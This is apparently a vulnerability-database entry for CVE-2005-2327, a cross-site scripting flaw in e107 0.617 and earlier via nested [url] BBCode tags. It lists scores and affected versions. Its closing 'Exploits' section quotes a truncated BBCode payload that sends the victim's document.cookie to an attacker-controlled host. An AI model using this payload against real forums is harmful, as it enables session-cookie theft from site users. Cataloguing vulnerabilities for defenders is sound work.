4.3
CVSSv2

CVE-2005-2327

Published: 20/07/2005 Updated: 19/10/2017
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

Cross-site scripting (XSS) vulnerability in e107 0.617 and previous versions allows remote malicious users to inject arbitrary web script or HTML via nested [url] BBCode tags.

Vulnerable Product Search on Vulmon Subscribe to Product

e107 e107 0.549_beta

e107 e107 0.551_beta

e107 e107 0.554_beta

e107 e107 0.555_beta

e107 e107 0.607

e107 e107 0.608

e107 e107 0.615a

e107 e107 0.547_beta

e107 e107 0.548_beta

e107 e107 0.600

e107 e107 0.601

e107 e107 0.602

e107 e107 0.609

e107 e107 0.610

e107 e107 0.617

e107 e107 5.04

e107 e107 5.4_beta3

e107 e107 5.4_beta4

e107 e107 5.4_beta5

e107 e107 0.616

e107 e107 5.3_beta2

e107 e107 5.4_beta1

e107 e107 0.603

e107 e107 0.604

e107 e107 0.611

e107 e107 0.612

e107 e107 5.05

e107 e107 5.1

e107 e107 5.4_beta6

e107 e107 0.552_beta

e107 e107 0.553_beta

e107 e107 0.605

e107 e107 0.606

e107 e107 0.613

e107 e107 0.614

e107 e107 5.21

e107 e107 5.3_beta

Exploits

/* 1) Change milw0rmcom to your domaincom 2) Post the below code into a new message Credits to Nick Griffin /str0ke */ [color=#EFEFEF][url]wwwut[url=wwws=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(thissss));'sss=`i=new/**/Image();isrc='wwwmilw0rmcom/cgi-bin/shelljpg?'+documentcookie;thissss=null`styl ...